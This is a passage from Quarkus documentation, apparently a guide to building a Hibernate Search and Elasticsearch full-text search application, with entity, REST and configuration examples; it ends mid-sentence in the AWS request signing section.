Create a new project with the following command:\n\n:create-app-artifact-id: hibernate-search-orm-elasticsearch-quickstart\n:create-app-extensions: hibernate-orm-panache,jdbc-postgresql,hibernate-search-orm-elasticsearch,resteasy-reactive-jackson\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven structure importing the following extensions:\n\n * Hibernate ORM with Panache,\n * the PostgreSQL JDBC driver,\n * Hibernate Search + Elasticsearch,\n * RESTEasy Reactive and Jackson.\n\nIf you already have your Quarkus project configured, you can add the `hibernate-search-orm-elasticsearch` extension\nto your project by running the following command in your project base directory:\n\n:add-extension-extensions: hibernate-search-orm-elasticsearch\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your `pom.xml`:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-search-orm-elasticsearch<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-hibernate-search-orm-elasticsearch\")\n----\n\n== Creating the bare entities\n\nFirst, let's create our Hibernate ORM entities `Book` and `Author` in the `model` subpackage.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Author extends PanacheEntity { \/\/ <1>\n\n public String firstName;\n\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER) \/\/ <2>\n public List<Book> books;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Author)) {\n return false;\n }\n\n Author other = (Author) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We are using Hibernate ORM with Panache, it is not mandatory.\n<2> We are loading these elements eagerly so that they are present in the JSON output.\nIn a real world application, you should probably use a DTO approach.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Book extends PanacheEntity {\n\n public String title;\n\n @ManyToOne\n @JsonIgnore <1>\n public Author author;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Book)) {\n return false;\n }\n\n Book other = (Book) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We mark this property with `@JsonIgnore` to avoid infinite loops when serializing with Jackson.\n\n== Initializing the REST service\n\nWhile everything is not yet set up for our REST service, we can initialize it with the standard CRUD operations we will need.\n\nCreate the 
`org.acme.hibernate.search.elasticsearch.LibraryResource` class:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch;\n\nimport java.util.List;\nimport java.util.Optional;\n\nimport javax.enterprise.event.Observes;\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.Consumes;\nimport javax.ws.rs.DELETE;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.PUT;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.core.MediaType;\n\nimport org.acme.hibernate.search.elasticsearch.model.Author;\nimport org.acme.hibernate.search.elasticsearch.model.Book;\nimport org.hibernate.search.mapper.orm.session.SearchSession;\nimport org.jboss.resteasy.reactive.RestForm;\nimport org.jboss.resteasy.reactive.RestQuery;\n\nimport io.quarkus.runtime.StartupEvent;\n\n@Path(\"\/library\")\npublic class LibraryResource {\n\n    @PUT\n    @Path(\"book\")\n    @Transactional\n    @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n    public void addBook(@RestForm String title, @RestForm Long authorId) {\n        Author author = Author.findById(authorId);\n        if (author == null) {\n            return;\n        }\n\n        Book book = new Book();\n        book.title = title;\n        book.author = author;\n        book.persist();\n\n        author.books.add(book);\n        author.persist();\n    }\n\n    @DELETE\n    @Path(\"book\/{id}\")\n    @Transactional\n    public void deleteBook(Long id) {\n        Book book = Book.findById(id);\n        if (book != null) {\n            book.author.books.remove(book);\n            book.delete();\n        }\n    }\n\n    @PUT\n    @Path(\"author\")\n    @Transactional\n    @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n    public void addAuthor(@RestForm String firstName, @RestForm String lastName) {\n        Author author = new Author();\n        author.firstName = firstName;\n        author.lastName = lastName;\n        author.persist();\n    }\n\n    @POST\n    @Path(\"author\/{id}\")\n    @Transactional\n    @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n    public void updateAuthor(Long id, @RestForm String firstName, @RestForm String lastName) {\n        Author author = Author.findById(id);\n        if (author == null) {\n            return;\n        }\n        author.firstName = firstName;\n        author.lastName = lastName;\n        author.persist();\n    }\n\n    @DELETE\n    @Path(\"author\/{id}\")\n    @Transactional\n    public void deleteAuthor(Long id) {\n        Author author = Author.findById(id);\n        if (author != null) {\n            author.delete();\n        }\n    }\n}\n----\n\nNothing out of the ordinary here: it is just good old Hibernate ORM with Panache operations in a REST service.\n\nIn fact, the interesting part is that we will need to add very few elements to make our full text search application work.\n\n== Using Hibernate Search annotations\n\nLet's go back to our entities.\n\nEnabling full text search capabilities for them is as simple as adding a few annotations.\n\nLet's edit the `Book` entity again to include this content:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed \/\/ <1>\npublic class Book extends PanacheEntity {\n\n    @FullTextField(analyzer = \"english\") \/\/ <2>\n    public String title;\n\n    @ManyToOne\n    @JsonIgnore\n    public Author author;\n\n    \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> First, let's use the `@Indexed` annotation to register 
our `Book` entity as part of the full text index.\n<2> The `@FullTextField` annotation declares a field in the index specifically tailored for full text search.\nIn particular, we have to define an analyzer to split and analyze the tokens (~ words) - more on this later.\n\nNow that our books are indexed, we can do the same for the authors.\n\nOpen the `Author` class and include the content below.\n\nThings are quite similar here: we use the `@Indexed`, `@FullTextField` and `@KeywordField` annotations.\n\nThere are a few differences\/additions though. Let's check them out.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport org.hibernate.search.engine.backend.types.Sortable;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.IndexedEmbedded;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.KeywordField;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed\npublic class Author extends PanacheEntity {\n\n @FullTextField(analyzer = \"name\") \/\/ <1>\n @KeywordField(name = \"firstName_sort\", sortable = Sortable.YES, normalizer = \"sort\") \/\/ <2>\n public String firstName;\n\n @FullTextField(analyzer = \"name\")\n @KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER)\n @IndexedEmbedded \/\/ <3>\n public List<Book> books;\n\n \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> We use a `@FullTextField` similar to what we did for `Book` but you'll notice that the analyzer is different - more on this later.\n<2> As you can see, we can define several fields for the same property.\nHere, we define a `@KeywordField` with a specific name.\nThe main difference is that a keyword field is not tokenized (the string is kept as one single token) but can be normalized (i.e. filtered) - more on this later.\nThis field is marked as sortable as our intention is to use it for sorting our authors.\n<3> The purpose of `@IndexedEmbedded` is to include the `Book` fields into the `Author` index.\nIn this case, we just use the default configuration: all the fields of the associated `Book` entities are included in the index (i.e. 
the `title` field).\nThe nice thing with `@IndexedEmbedded` is that it is able to automatically reindex an `Author` if one of its ``Book``s has been updated, thanks to the bidirectional relation.\n`@IndexedEmbedded` also supports nested documents (using the `storage = NESTED` attribute), but we don't need it here.\nYou can also specify the fields you want to include in your parent index using the `includePaths` attribute if you don't want them all.\n\n== Analyzers and normalizers\n\n=== Introduction\n\nAnalysis is a big part of full text search: it defines how text will be processed when indexing or building search queries.\n\nThe role of analyzers is to split the text into tokens (~ words) and filter them (making it all lowercase and removing accents for instance).\n\nNormalizers are a special type of analyzer that keeps the input as a single token.\nThey are especially useful for sorting or indexing keywords.\n\nThere are a lot of bundled analyzers, but you can also develop your own for your specific purposes.\n\nYou can learn more about the Elasticsearch analysis framework in the https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis.html[Analysis section of the Elasticsearch documentation].\n\n=== Defining the analyzers used\n\nWhen we added the Hibernate Search annotations to our entities, we defined the analyzers and normalizers used.\nTypically:\n\n[source,java]\n----\n@FullTextField(analyzer = \"english\")\n----\n\n[source,java]\n----\n@FullTextField(analyzer = \"name\")\n----\n\n[source,java]\n----\n@KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n----\n\nWe use:\n\n * an analyzer called `name` for person names,\n * an analyzer called `english` for book titles,\n * a normalizer called `sort` for our sort fields,\n\nbut we haven't set them up yet.\n\nLet's see how you can do it with Hibernate Search.\n\n[[analysis-configurer]]\n=== Setting up the analyzers\n\nIt is an easy task: we just need to create an implementation of `ElasticsearchAnalysisConfigurer`\n(and configure Quarkus to use it, more on that later).\n\nTo fulfill our requirements, let's create the following implementation:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.config;\n\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurationContext;\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurer;\n\nimport javax.enterprise.context.Dependent;\nimport javax.inject.Named;\n\n@Dependent\n@Named(\"myAnalysisConfigurer\") \/\/ <1>\npublic class AnalysisConfigurer implements ElasticsearchAnalysisConfigurer {\n\n    @Override\n    public void configure(ElasticsearchAnalysisConfigurationContext context) {\n        context.analyzer(\"name\").custom() \/\/ <2>\n                .tokenizer(\"standard\")\n                .tokenFilters(\"asciifolding\", \"lowercase\");\n\n        context.analyzer(\"english\").custom() \/\/ <3>\n                .tokenizer(\"standard\")\n                .tokenFilters(\"asciifolding\", \"lowercase\", \"porter_stem\");\n\n        context.normalizer(\"sort\").custom() \/\/ <4>\n                .tokenFilters(\"asciifolding\", \"lowercase\");\n    }\n}\n----\n<1> We will need to reference the configurer from the configuration properties, so we make it a named bean.\n<2> This is a simple analyzer splitting the words on spaces, replacing any non-ASCII character with its ASCII counterpart (and thus removing accents) and putting everything in lowercase.\nIt is used in our examples for the authors' names.\n<3> We are a bit more aggressive with this one and we include some stemming: we will be able to search for `mystery` and get a result even if the indexed input contains `mysteries`.\nIt is definitely too aggressive for person names, but it is perfect for the book titles.\n<4> Here is the normalizer used for sorting. It is very similar to our first analyzer, except we don't tokenize the words, as we want one and only one token.\n\n== Adding full text capabilities to our REST service\n\nIn our existing `LibraryResource`, we just need to inject the `SearchSession`:\n\n[source,java]\n----\n    @Inject\n    SearchSession searchSession; \/\/ <1>\n----\n<1> Inject a Hibernate Search session, which relies on the `EntityManager` under the hood.\nApplications with multiple persistence units can use the CDI qualifier `@io.quarkus.hibernate.orm.PersistenceUnit`\nto select the right one:\nsee <<multiple-persistence-units-attaching-cdi>>.\n\nAnd then we can add the following methods (and a few ``import``s):\n\n[source,java]\n----\n    @Transactional \/\/ <1>\n    void onStart(@Observes StartupEvent ev) throws InterruptedException { \/\/ <2>\n        \/\/ only reindex if we imported some content\n        if (Book.count() > 0) {\n            searchSession.massIndexer()\n                    .startAndWait();\n        }\n    }\n\n    @GET\n    @Path(\"author\/search\") \/\/ <3>\n    @Transactional\n    public List<Author> searchAuthors(@RestQuery String pattern, \/\/ <4>\n            @RestQuery Optional<Integer> size) {\n        return searchSession.search(Author.class) \/\/ <5>\n                .where(f ->\n                    pattern == null || pattern.trim().isEmpty() ?\n                            f.matchAll() : \/\/ <6>\n                            f.simpleQueryString()\n                                    .fields(\"firstName\", \"lastName\", \"books.title\").matching(pattern) \/\/ <7>\n                )\n                .sort(f -> f.field(\"lastName_sort\").then().field(\"firstName_sort\")) \/\/ <8>\n                .fetchHits(size.orElse(20)); \/\/ <9>\n    }\n----\n<1> Important point: we need a transactional context for these methods.\n<2> As we will import data into the PostgreSQL database using an SQL script, we need to reindex the data at startup.\nFor this, we use Hibernate Search's mass indexer, which allows you to index a lot of data efficiently (you can fine-tune it for better performance).\nAll the upcoming updates coming through Hibernate ORM operations will be synchronized automatically to the full text index.\nIf you don't import data manually into the database, you don't need that:\nthe mass indexer should then only be used when you change your indexing configuration (adding a new field, changing an analyzer's configuration...) and you want the new configuration to be applied to your existing entities.\n<3> This is where the magic begins: just adding the annotations to our entities makes them available for full text search: we can now query the index using the Hibernate Search DSL.\n<4> Use the `org.jboss.resteasy.reactive.RestQuery` annotation type to avoid repeating the parameter name.\n<5> We indicate that we are searching for ``Author``s.\n<6> We create a predicate: if the pattern is empty, we use a `matchAll()` predicate.\n<7> If we have a valid pattern, we create a https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/query-dsl-simple-query-string-query.html[`simpleQueryString()`] predicate on the `firstName`, `lastName` and `books.title` fields matching our pattern.\n<8> We define the sort order of our results. Here we sort by last name, then by first name. Note that we use the specific fields we created for sorting.\n<9> Fetch the `size` top hits, `20` by default. 
Obviously, paging is also supported.\n\n[NOTE]\n====\nThe Hibernate Search DSL supports a significant subset of the Elasticsearch predicates (match, range, nested, phrase, spatial...).\nFeel free to explore the DSL using autocompletion.\n\nWhen that's not enough, you can always fall back to\nlink:{hibernate-search-doc-prefix}#search-dsl-predicate-extensions-elasticsearch-from-json[defining a predicate using JSON directly].\n====\n\n== Configuring the application\n\nAs usual, we can configure everything in the Quarkus configuration file, `application.properties`.\n\nEdit `src\/main\/resources\/application.properties` and inject the following configuration:\n\n[source,properties]\n----\nquarkus.ssl.native=false <1>\n\nquarkus.datasource.db-kind=postgresql <2>\n\nquarkus.hibernate-orm.database.generation=drop-and-create <3>\nquarkus.hibernate-orm.sql-load-script=import.sql <4>\n\nquarkus.hibernate-search-orm.elasticsearch.version=7 <5>\nquarkus.hibernate-search-orm.elasticsearch.analysis.configurer=bean:myAnalysisConfigurer <6>\nquarkus.hibernate-search-orm.schema-management.strategy=drop-and-create <7>\nquarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy=sync <8>\n\n%prod.quarkus.datasource.jdbc.url=jdbc:postgresql:\/\/localhost\/quarkus_test <9>\n%prod.quarkus.datasource.username=quarkus_test\n%prod.quarkus.datasource.password=quarkus_test\n%prod.hibernate-search-orm.elasticsearch.hosts=localhost:9200 <9>\n----\n<1> We won't use SSL, so we disable it to have a more compact native executable.\n<2> Let's create a PostgreSQL datasource.\n<3> We will drop and recreate the schema every time we start the application.\n<4> We load some initial data.\n<5> We need to tell Hibernate Search about the version of Elasticsearch we will use.\nIt is important because there are significant differences between Elasticsearch mapping syntax depending on the version.\nSince the mapping is created at build time to reduce startup time, Hibernate Search cannot connect to the cluster to automatically detect the version.\nNote that, for OpenSearch, you need to prefix the version with `opensearch:`; see <<opensearch>>.\n<6> We point to the custom `AnalysisConfigurer` which defines the configuration of our analyzers and normalizers.\n<7> Obviously, this is not for production: we drop and recreate the index every time we start the application.\n<8> This means that we wait for the entities to be searchable before considering a write complete.\nOn a production setup, the `write-sync` default will provide better performance.\nUsing `sync` is especially important when testing as you need the entities to be searchable immediately.\n<9> For development and tests, we rely on <<dev-services,Dev Services>>,\nwhich means Quarkus will start a PostgreSQL database and Elasticsearch cluster automatically.\nIn production mode, however,\nyou will want to start a PostgreSQL database and Elasticsearch cluster manually,\nwhich is why we provide Quarkus with this connection info in the `prod` profile (`%prod.` prefix).\n\n[TIP]\nFor more information about the Hibernate Search extension configuration please refer to the <<configuration-reference, Configuration Reference>>.\n\n[[dev-services]]\n=== Dev Services (Configuration Free Databases)\nQuarkus supports a feature called Dev Services that allows you to start various containers without any config.\nIn the case of Elasticsearch this support extends to the default Elasticsearch connection.\nWhat that means practically, is that if you have not configured 
`quarkus.hibernate-search-orm.elasticsearch.hosts` Quarkus will automatically\nstart an Elasticsearch container when running tests or in xref:dev-mode-differences.adoc[dev mode], and automatically configure the connection.\n\nWhen running the production version of the application, the Elasticsearch connection needs to be configured as normal,\nso if you want to include a production database config in your `application.properties` and continue to use Dev Services\nwe recommend that you use the `%prod.` profile to define your Elasticsearch settings.\n\nNOTE: Dev Services for Elasticsearch is currently unable to start multiple clusters concurrently, so it only works with the default backend of the default persistence unit: named persistence units or named backends won't be able to take advantage of Dev Services for Elasticsearch.\n\nFor more information you can read the xref:elasticsearch-dev-services.adoc[Dev Services for Elasticsearch guide].\n\n== Creating a frontend\n\nNow let's add a simple web page to interact with our `LibraryResource`.\nQuarkus automatically serves static resources located under the `META-INF\/resources` directory.\nIn the `src\/main\/resources\/META-INF\/resources` directory, overwrite the existing `index.html` file with the content from this\n{quickstarts-blob-url}\/hibernate-search-orm-elasticsearch-quickstart\/src\/main\/resources\/META-INF\/resources\/index.html[index.html] file.\n\n== Automatic import script\n\nFor the purpose of this demonstration, let's import an initial dataset.\n\nLet's create a `src\/main\/resources\/import.sql` file with the following content:\n\n[source,sql]\n----\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'John', 'Irving');\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'Paul', 'Auster');\n\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The World According to Garp', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Hotel New Hampshire', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Cider House Rules', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'A Prayer for Owen Meany', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Last Night in Twisted River', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'In One Person', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Avenue of Mysteries', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The New York Trilogy', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Mr. 
Vertigo', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Brooklyn Follies', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Invisible', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Sunset Park', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), '4 3 2 1', 2);\n----\n\n== Time to play with your application\n\nYou can now interact with your REST service:\n\n:devtools-wrapped:\n\n * start your Quarkus application with:\n+\ninclude::{includes}\/devtools\/dev.adoc[]\n * open a browser to `http:\/\/localhost:8080\/`\n * search for authors or book titles (we initialized some data for you)\n * create new authors and books and search for them too\n\n:!devtools-wrapped:\n\nAs you can see, all your updates are automatically synchronized to the Elasticsearch cluster.\n\n[[opensearch]]\n== OpenSearch compatibility\n\nHibernate Search is compatible with both https:\/\/www.elastic.co\/elasticsearch[Elasticsearch]\nand https:\/\/www.opensearch.org\/[OpenSearch],\nbut it assumes it is working with an Elasticsearch cluster by default.\n\nTo have Hibernate Search work with an OpenSearch cluster instead,\nlink:{hibernate-search-doc-prefix}#backend-elasticsearch-configuration-version[prefix the configured version with `opensearch:`],\nas shown below.\n\n[source,properties]\n----\nquarkus.hibernate-search-orm.elasticsearch.version=opensearch:1.2\n----\n\nAll other configuration options and APIs are exactly the same as with Elasticsearch.\n\nYou can find more information about compatible distributions and versions of Elasticsearch in\nlink:{hibernate-search-doc-prefix}#getting-started-compatibility[this section of Hibernate Search's reference documentation].\n\n[[multiple-persistence-units]]\n== Multiple persistence units\n\n=== Configuring multiple persistence units\n\nWith the Hibernate ORM extension,\nxref:hibernate-orm.adoc#multiple-persistence-units[you can set up multiple persistence units],\neach with its own datasource and configuration.\n\nIf you do declare multiple persistence units,\nyou will also configure Hibernate Search separately for each persistence unit.\n\nThe properties at the root of the `quarkus.hibernate-search-orm.` namespace define the default persistence unit.\nFor instance, the following snippet defines a default datasource and a default persistence unit,\nand sets the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n\n[source,properties]\n----\nquarkus.datasource.db-kind=h2\nquarkus.datasource.jdbc.url=jdbc:h2:mem:default;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.dialect=org.hibernate.dialect.H2Dialect\n\nquarkus.hibernate-search-orm.elasticsearch.hosts=es1.mycompany.com:9200\nquarkus.hibernate-search-orm.elasticsearch.version=7\nquarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy=write-sync\n----\n\nUsing a map based approach, it is also possible to configure named persistence units:\n\n[source,properties]\n----\nquarkus.datasource.\"users\".db-kind=h2 <1>\nquarkus.datasource.\"users\".jdbc.url=jdbc:h2:mem:users;DB_CLOSE_DELAY=-1\n\nquarkus.datasource.\"inventory\".db-kind=h2 <2>\nquarkus.datasource.\"inventory\".jdbc.url=jdbc:h2:mem:inventory;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.\"users\".datasource=users <3>\nquarkus.hibernate-orm.\"users\".packages=org.acme.model.user\n\nquarkus.hibernate-orm.\"inventory\".datasource=inventory 
<4>\nquarkus.hibernate-orm.\"inventory\".packages=org.acme.model.inventory\n\nquarkus.hibernate-search-orm.\"users\".elasticsearch.hosts=es1.mycompany.com:9200 <5>\nquarkus.hibernate-search-orm.\"users\".elasticsearch.version=7\nquarkus.hibernate-search-orm.\"users\".automatic-indexing.synchronization.strategy=write-sync\n\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.hosts=es2.mycompany.com:9200 <6>\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.version=7\nquarkus.hibernate-search-orm.\"inventory\".automatic-indexing.synchronization.strategy=write-sync\n----\n<1> Define a datasource named `users`.\n<2> Define a datasource named `inventory`.\n<3> Define a persistence unit called `users` pointing to the `users` datasource.\n<4> Define a persistence unit called `inventory` pointing to the `inventory` datasource.\n<5> Configure Hibernate Search for the `users` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n<6> Configure Hibernate Search for the `inventory` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es2.mycompany.com:9200`.\n\n[[multiple-persistence-units-attaching-model-classes]]\n=== Attaching model classes to persistence units\n\nFor each persistence unit, Hibernate Search will only consider indexed entities that are attached to that persistence unit.\nEntities are attached to a persistence unit by\nxref:hibernate-orm.adoc#multiple-persistence-units-attaching-model-classes[configuring the Hibernate ORM extension].\n\n[[multiple-persistence-units-attaching-cdi]]\n== CDI integration\n\nYou can inject Hibernate Search's main entry points, `SearchSession` and `SearchMapping`, using CDI:\n\n[source,java]\n----\n@Inject\nSearchSession searchSession;\n----\n\nThis will inject the `SearchSession` of the default persistence unit.\n\nTo inject the `SearchSession` of a named persistence unit (`users` in our example),\njust add a qualifier:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\") <1>\nSearchSession searchSession;\n----\n<1> This is the `@io.quarkus.hibernate.orm.PersistenceUnit` annotation.\n\nYou can inject the `SearchMapping` of a named persistence unit using the exact same mechanism:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\")\nSearchMapping searchMapping;\n----\n\n== Building a native executable\n\nYou can build a native executable with the usual command `.\/mvnw package -Pnative`.\n\n[NOTE]\n====\nAs usual with native executable compilation, this operation consumes a lot of memory.\n\nIt might be safer to stop the two containers while you are building the native executable and start them again once you are done.\n====\n\nRunning it is as simple as executing `.\/target\/hibernate-search-orm-elasticsearch-quickstart-1.0.0-SNAPSHOT-runner`.\n\nYou can then point your browser to `http:\/\/localhost:8080\/` and use your application.\n\n[NOTE]\n====\nThe startup is a bit slower than usual: it is mostly due to us dropping and recreating the database schema and the Elasticsearch mapping every time at startup.\nWe also inject some data and execute the mass indexer.\n\nIn a real life application, it is obviously something you won't do at startup.\n====\n\n[[offline-startup]]\n== Offline startup\n\nBy default, Hibernate Search sends a few requests to the Elasticsearch cluster on startup.\nIf the Elasticsearch cluster is not necessarily up and running when Hibernate Search starts,\nthis could cause a startup failure.\n\nTo address this, you can configure 
Hibernate Search to not send any request on startup:\n\n* Disable Elasticsearch version checks on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.elasticsearch.version-check.enabled[`quarkus.hibernate-search-orm.elasticsearch.version-check.enabled`]\n to `false`.\n* Disable schema management on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.schema-management.strategy[`quarkus.hibernate-search-orm.schema-management.strategy`]\n to `none`.\n\nOf course, even with this configuration, Hibernate Search still won't be able to index anything or run search queries\nuntil the Elasticsearch cluster becomes accessible.\n\n[IMPORTANT]\n====\nIf you disable automatic schema creation by setting `quarkus.hibernate-search-orm.schema-management.strategy` to `none`,\nyou will have to create the schema manually at some point before your application starts persisting\/updating entities\nand executing search requests.\n\nSee link:{hibernate-search-doc-prefix}#mapper-orm-schema-management-manager[this section of the reference documentation]\nfor more information.\n====\n\n[[coordination]]\n== Coordination through outbox polling\n\n[CAUTION]\n====\nCoordination through outbox polling is considered preview.\n\nIn _preview_, backward compatibility and presence in the ecosystem is not guaranteed.\nSpecific improvements might require changing configuration or APIs, or even storage formats,\nand plans to become _stable_ are under way.\nFeedback is welcome on our https:\/\/groups.google.com\/d\/forum\/quarkus-dev[mailing list]\nor as issues in our https:\/\/github.com\/quarkusio\/quarkus\/issues[GitHub issue tracker].\n====\n\nWhile it\u2019s technically possible to use Hibernate Search and Elasticsearch in distributed applications,\nby default they suffer from\nlink:{hibernate-search-doc-prefix}#architecture-examples-no-coordination-elasticsearch-pros-and-cons[a few limitations].\n\nThese limitations are the result of Hibernate Search not coordinating between threads or application nodes by default.\n\nIn order to get rid of these limitations, you can\nlink:{hibernate-search-doc-prefix}#architecture-examples-outbox-polling-elasticsearch[use the `outbox-polling` coordination strategy].\nThis strategy creates an outbox table in the database to push entity change events to,\nand relies on a background processor to consume these events and perform automatic indexing.\n\nTo enable the `outbox-polling` coordination strategy, an additional extension is required:\n\n:add-extension-extensions: hibernate-search-orm-coordination-outbox-polling\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nOnce the extension is there, you will need to explicitly select the `outbox-polling` strategy\nby setting link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.coordination.strategy[`quarkus.hibernate-search-orm.coordination.strategy`]\nto `outbox-polling`.\n\nFinally, you will need to make sure that the Hibernate ORM entities added by Hibernate Search\n(to represent the outbox and agents) have corresponding tables\/sequences in your database:\n\n* If you are just starting with your application\nand intend to xref:hibernate-orm.adoc#dev-mode[let Hibernate ORM generate your database schema],\nthen no worries: the entities required by Hibernate Search will be included in the generated schema.\n* Otherwise, you 
must\nlink:{hibernate-search-doc-prefix}#coordination-outbox-polling-schema[manually alter your schema to add the necessary tables\/sequences].\n\nOnce you are done with the above, you're ready to use Hibernate Search with an outbox.\nDon't change any code, and just start your application:\nit will automatically detect when multiple applications are connected to the same database,\nand coordinate the index updates accordingly.\n\n[NOTE]\n====\nHibernate Search mostly behaves the same when using the `outbox-polling` coordination strategy\nas when not using it: application code (persisting entities, searching, etc.) should not require any change.\n\nHowever, there is one key difference: index updates are necessarily asynchronous;\nthey are guaranteed to happen _eventually_, but not immediately.\n\nThis means in particular that the configuration property\nlink:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy[`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`]\ncannot be set when using the `outbox-polling` coordination strategy:\nHibernate Search will always behave as if this property was set to `write-sync` (the default).\n\nThis behavior is consistent with Elasticsearch's\nhttps:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/near-real-time.html[near-real-time search]\nand the recommended way of using Hibernate Search even when coordination is disabled.\n====\n\nFor more information about coordination in Hibernate Search,\nsee link:{hibernate-search-doc-prefix}#coordination[this section of the reference documentation].\n\nFor more information about configuration options related to coordination,\nsee <<configuration-reference-coordination-outbox-polling>>.\n\n[[aws-request-signing]]\n== [[configuration-reference-aws]] AWS request signing\n\nIf you need to use https:\/\/docs.aws.amazon.com\/elasticsearch-service\/[Amazon\u2019s managed Elasticsearch service],\nyou will find it requires a proprietary authentication method involving request signing.\n\nYou can enable AWS request signing in Hibernate Search by adding a dedicated extension to your project and configuring 